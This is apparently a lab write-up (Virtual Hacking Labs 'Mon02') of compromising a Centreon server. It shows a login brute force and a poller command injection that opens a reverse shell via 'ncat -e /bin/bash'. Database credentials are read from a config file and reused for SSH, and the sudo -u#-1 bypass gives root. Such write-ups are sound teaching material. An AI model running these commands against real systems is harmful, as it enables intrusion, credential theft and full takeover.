WriteupsVHL — Mon02
WebMediumLinux
VHL — Mon02
Centreon IT monitoring platform on Red Hat. Default credentials lead to authenticated RCE via malicious poller command injection.
February 16, 2025Virtual Hacking Labs
#Centreon#Default Creds#Command Injection#RCE
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.2.244
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 18:50 EST
Nmap scan report for 10.11.2.244
Host is up (0.021s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:3e:25:b0:d3:1c:75:86:dc:80:dd:25:3a:07:e0:5e (RSA)
| 256 b4:a7:a3:10:64:09:d4:48:f6:e0:a9:60:98:9f:30:ee (ECDSA)
|_ 256 74:4e:75:19:ff:23:40:0b:30:b4:18:51:47:18:aa:9b (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Red Hat))
| http-title: Centreon - IT & Network Monitoring
|_Requested resource was http://10.11.2.244/centreon/
|_http-server-header: Apache/2.4.34 (Red Hat)
|_http-generator: Centreon - Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
3306/tcp open mysql MariaDB (unauthorized)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/16%OT=22%CT=1%CU=31961%PV=Y%DS=2%DC=I%G=Y%TM=67B2
OS:79D9%P=x86_64-pc-linux-gnu)SEQ(SP=108%GCD=1%ISR=10A%TI=Z%II=I%TS=A)OPS(O
OS:1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M5B4ST11N
OS:W7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN(R
OS:=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK
OS:=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)80
sh
80/tcp open http Apache httpd 2.4.34 ((Red Hat))
| http-title: Centreon - IT & Network Monitoring
|_Requested resource was http://10.11.2.244/centreon/
|_http-server-header: Apache/2.4.34 (Red Hat)
|_http-generator: Centreon - Copyright (C) 2005 - 2019 Open Source Matters. All rights reserved.
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not setCentreon-v19.04-Brute-Forcer-RCE
- https://github.com/heartburn-dev/Centreon-v19.04-Brute-Forcer-RCE
sh
python2 magic.py -t 10.11.2.244 -p 80 -m 1
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
:::: :::: ::: :::::::: ::::::::::: ::::::::
+:+:+: :+:+:+ :+: :+: :+: :+: :+: :+: :+:
+:+ +:+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#+ +#++:++#++: :#: +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+# +#+ +#+
#+# #+# #+# #+# #+# #+# #+# #+# #+#
### ### ### ### ######## ########### ########
By a very tired 0xskunk
[!] Example Usage [!]
----------------------------------------
[1] Brute Force Mode [1]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 1
----------------------------------------
[2] RCE Mode [2]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 2
----------------------------------------
[3] Reverse Shell Mode [3]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 3 -i 192.168.69.1 -l 443
----------------------------------------
[*] I need to know if your target is running SSL or not!
[?] HTTP (1) or HTTPS (2): 1
[*] Target: http://10.11.2.244:80/centreon/index.php
[*] Now I'm gonna need a username..
[?] Username: admin
[*] Now I'm gonna need a wordlist to use. Absolute path would be ideal (/usr/share/wordlists/rockyou.txt)?
[?] Wordlis^C
[!] CTRL-C detected. Exiting gracefully... <3
┌──(root㉿kali)-[/home/sake/vhl/Mon02/Centreon-v19.04-Brute-Forcer-RCE]
└─# python2 magic.py -t 10.11.2.244 -p 80 -m 1
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
:::: :::: ::: :::::::: ::::::::::: ::::::::
+:+:+: :+:+:+ :+: :+: :+: :+: :+: :+: :+:
+:+ +:+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#+ +#++:++#++: :#: +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+# +#+ +#+
#+# #+# #+# #+# #+# #+# #+# #+# #+#
### ### ### ### ######## ########### ########
By a very tired 0xskunk
[!] Example Usage [!]
----------------------------------------
[1] Brute Force Mode [1]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 1
----------------------------------------
[2] RCE Mode [2]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 2
----------------------------------------
[3] Reverse Shell Mode [3]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 3 -i 192.168.69.1 -l 443
----------------------------------------
[*] I need to know if your target is running SSL or not!
[?] HTTP (1) or HTTPS (2): 1
[*] Target: http://10.11.2.244:80/centreon/index.php
[*] Now I'm gonna need a username..
[?] Username: admin
[*] Now I'm gonna need a wordlist to use. Absolute path would be ideal (/usr/share/wordlists/rockyou.txt)?
[?] Wordlist: /usr/share/wordlists/rockyou.txt
[!] This won't be quiet.. Would you like to set a delay between requests? (Just put 0 if not)
[?] Delay: 0
[!] CSRF Token on this run = ad53fa8c...
[0] Attempting to login with password: 123456
[!] CSRF Token on this run = b94dba45...
[1] Attempting to login with password: 12345
[!] CSRF Token on this run = 31688535...
[2] Attempting to login with password: 123456789
[!] CSRF Token on this run = 2109f3c5...
[3] Attempting to login with password: password
[!] CSRF Token on this run = b8ee54e4...
[4] Attempting to login with password: iloveyou
[!] CSRF Token on this run = 46c4650c...
[5] Attempting to login with password: princess
[!] CSRF Token on this run = 81f41528...
[6] Attempting to login with password: 1234567
[!] CSRF Token on this run = 7cd0e45c...
[7] Attempting to login with password: rockyou
[!] CSRF Token on this run = adb8dadd...
[8] Attempting to login with password: 12345678
[!] CSRF Token on this run = 32736173...
[9] Attempting to login with password: abc123
[!] CSRF Token on this run = faacec48...
[10] Attempting to login with password: nicole
[!] CSRF Token on this run = 36e743be...
[11] Attempting to login with password: daniel
[!] CSRF Token on this run = 1638293f...
[12] Attempting to login with password: babygirl
[!] CSRF Token on this run = 4fed9833...
[13] Attempting to login with password: monkey
[!] CSRF Token on this run = e8d8b5ce...
[14] Attempting to login with password: lovely
[!] CSRF Token on this run = d82b5bff...
[15] Attempting to login with password: jessica
[!] CSRF Token on this run = a365f12c...
[16] Attempting to login with password: 654321
[!] CSRF Token on this run = 73b27607...
[17] Attempting to login with password: michael
[!] CSRF Token on this run = 8fda9160...
[18] Attempting to login with password: ashley
[!] CSRF Token on this run = 85679c93...
[19] Attempting to login with password: qwerty
[!] CSRF Token on this run = 3a6cc976...
[20] Attempting to login with password: 111111
[!] CSRF Token on this run = 736482e2...
[21] Attempting to login with password: iloveu
[!] CSRF Token on this run = af639509...
[22] Attempting to login with password: 000000
[!] CSRF Token on this run = a7f3fb58...
[23] Attempting to login with password: michelle
[!] CSRF Token on this run = 4c2c8e1a...
[24] Attempting to login with password: tigger
[!] CSRF Token on this run = 9fc7f1d5...
[25] Attempting to login with password: sunshine
[*] Password sunshine is correct.
[*] Bye for now. Hope you got what you needed!
creds
admin:sunshine
reverse shell as apache
sh
python2 magic.py -t 10.11.2.244 -p 80 -m 3 -i 172.16.1.1 -l 1234
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
:::: :::: ::: :::::::: ::::::::::: ::::::::
+:+:+: :+:+:+ :+: :+: :+: :+: :+: :+: :+:
+:+ +:+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#+ +#++:++#++: :#: +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+# +#+ +#+
#+# #+# #+# #+# #+# #+# #+# #+# #+#
### ### ### ### ######## ########### ########
By a very tired 0xskunk
[!] Example Usage [!]
----------------------------------------
[1] Brute Force Mode [1]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 1
----------------------------------------
[2] RCE Mode [2]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 2
----------------------------------------
[3] Reverse Shell Mode [3]
[!] Example Usage: python centreon.py -t 10.10.10.10 -p 80 -m 3 -i 192.168.69.1 -l 443
----------------------------------------
[*] I need to know if your target is running SSL or not!
[?] HTTP (1) or HTTPS (2): 1
[*] Target: http://10.11.2.244:80/centreon/index.php
[*] Now I'm gonna need a username..
[?] Username: admin
[*] And now I'm gonna need the password sir.
[*] Password: sunshine
[!] CSRF Token on this run = a81df156...
[*] We found the poller token: 6dd8485c...
[*] Command: ncat -e /bin/bash 172.16.1.1 1234 #
[*] Payload has been injected.. Executing command...sh
rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.2.244] 32824
whoami
apachepriv esc
sh
Linux localhost.localdomain 3.10.0-957.el7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
cat /etc/os-release
NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"
CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"sh
python -c 'import pty; pty.spawn("/bin/bash")'sh
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/make
/usr/bin/nc
/usr/bin/ncat
/usr/bin/perl
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/sudo
╔══════════╣ Installed Compilers
╔══════════╣ MySQL version
mysql Ver 15.1 Distrib 10.1.38-MariaDB, for Linux (x86_64) using readline 5.1sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp LISTEN 0 128 127.0.0.1:199 *:*
tcp LISTEN 0 128 127.0.0.1:9000 *:* users:(("php-fpm",pid=7041,fd=0),("php-fpm",pid=7040,fd=0),("php-fpm",pid=7039,fd=0),("php-fpm",pid=7038,fd=0),("php-fpm",pid=7037,fd=0))
tcp LISTEN 0 128 127.0.0.1:9042 *:* users:(("php-fpm",pid=20891,fd=0),("php-fpm",pid=20869,fd=0),("ncat",pid=20853,fd=0),("php-fpm",pid=20848,fd=0))
tcp LISTEN 0 128 *:22 *:*
tcp LISTEN 0 100 127.0.0.1:25 *:*
tcp LISTEN 0 80 :::3306 :::*
tcp LISTEN 0 128 :::80 :::*
tcp LISTEN 0 128 :::22 :::*
tcp LISTEN 0 100 ::1:25 :::* sh
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 3.10.0-957.el7.x86_64 (mockbuild@kbuilder.bsys.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-36) (GCC) ) #1 SMP Thu Nov 8 23:39:32 UTC 2018
LSB Version: :core-4.1-amd64:core-4.1-noarch:cxx-4.1-amd64:cxx-4.1-noarch:desktop-4.1-amd64:desktop-4.1-noarch:languages-4.1-amd64:languages-4.1-noarch:printing-4.1-amd64:printing-4.1-noarch
Distributor ID: CentOS
Description: CentOS Linux release 7.6.1810 (Core)
Release: 7.6.1810
Codename: Core
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.23sh
Group centreon-engine:
/etc/centreon-engine
/etc/centreon-engine/objects
/etc/centreon-engine/objects/commands.cfg
/etc/centreon-engine/objects/contacts.cfg
/etc/centreon-engine/objects/localhost.cfg
/etc/centreon-engine/objects/printer.cfg
/etc/centreon-engine/objects/switch.cfg
#)You_can_write_even_more_files_inside_last_directory
/etc/centreon-engine/centengine.cfg
/etc/centreon-engine/resource.cfg
/etc/centreon-engine/conf.d
/etc/centreon-engine/conf.d/cbmod.cfg
/var/lib/centreon-engine/rw
Group centreon-broker:
/etc/centreon-broker
/etc/centreon-broker/central-broker.xml
/etc/centreon-broker/central-rrd.xml
/etc/centreon-broker/watchdog.xml
/etc/centreon-broker/poller-module.xml
/var/lib/centreon-broker
/var/lib/centreon-broker/.bash_logout
/var/lib/centreon-broker/.bash_profile
/var/lib/centreon-broker/.bashrc
/var/log/centreon-broker
/usr/share/centreon-broker
/usr/share/centreon-broker/lua
awk: cmd. line:1: (FILENAME=- FNR=1113) fatal: print to "standard output" failed (Broken pipe)
grep: write error
Group centreon:
/etc/snmp/centreon_traps
/etc/centreon
/etc/centreon/conf.pm
/etc/centreon/instCentCore.conf
/etc/centreon/license.d
/etc/centreon/instCentPlugins.conf
/etc/centreon/instCentWeb.conf
/var/lib/centreon
/var/lib/centreon/centplugins
/var/lib/centreon/centcore
/var/lib/centreon/log
/var/lib/centreon/metrics
/var/lib/centreon/nagios-perf
/var/log/centreon
/var/cache/centreon/backup
centreon config file
sh
bash-4.2$ cat centreon.conf.php
cat centreon.conf.php
<?php
/*
* Centreon is developped with GPL Licence 2.0 :
* http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
* Developped by : Julien Mathis - Romain Le Merlus - Christophe Coraboeuf
*
* The Software is provided to you AS IS and WITH ALL FAULTS.
* Centreon makes no representation and gives no warranty whatsoever,
* whether express or implied, and without limitation, with regard to the quality,
* safety, contents, performance, merchantability, non-infringement or suitability for
* any particular or intended purpose of the Software found on the Centreon web site.
* In no event will Centreon be liable for any direct, indirect, punitive, special,
* incidental or consequential damages however they may arise and even if Centreon has
* been previously advised of the possibility of such damages.
*
* For information : contact@centreon.com
*/
/* Database */
$conf_centreon['hostCentreon'] = "localhost";
$conf_centreon['hostCentstorage'] = "localhost";
$conf_centreon['user'] = "mon02";
$conf_centreon['password'] = 'AkkWqp123';
$conf_centreon['db'] = "centreon";
$conf_centreon['dbcstg'] = "centreon_storage";
$conf_centreon['port'] = "3306";
/* path to classes */
$classdir='./class';
/* Centreon Path */
$centreon_path='/usr/share/centreon/';creds
mon02:AkkWqp123
ssh as mon02
sh
ssh mon02@10.11.2.244
mon02@10.11.2.244's password: AkkWqp123
[mon02@localhost ~]$ whoami
mon02sh
[mon02@localhost ~]$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for mon02:
Matching Defaults entries for mon02 on localhost:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User mon02 may run the following commands on localhost:
(ALL, !root) ALLsudo security bypass
sh
[mon02@localhost ~]$ sudo -u#-1 /bin/bash
[sudo] password for mon02:
bash-4.2# whoami
root
bash-4.2# cat /root/key.txt
vblhtebxwf1wwppmret3
bash-4.2# date
Mon Feb 17 04:10:38 CET 2025
Up next
MediumFeb 2025
VHL — Websrv01
Food Magazine site on Ubuntu with Exim 4.91 SMTP. Exploited CVE-2019-10149 Exim privilege escalation (GHOSTCAT) for root.
Read writeup
MediumFeb 2025
VHL — PMV02
b2evolution blog CMS on Ubuntu. Authenticated file manager abuse and PHP filter injection lead to remote code execution.
Read writeup
MediumFeb 2025
VHL — Tracker
MantisBT bug tracker on Debian with POP3. Credential enumeration via mail service and MantisBT RCE for shell access.
Read writeup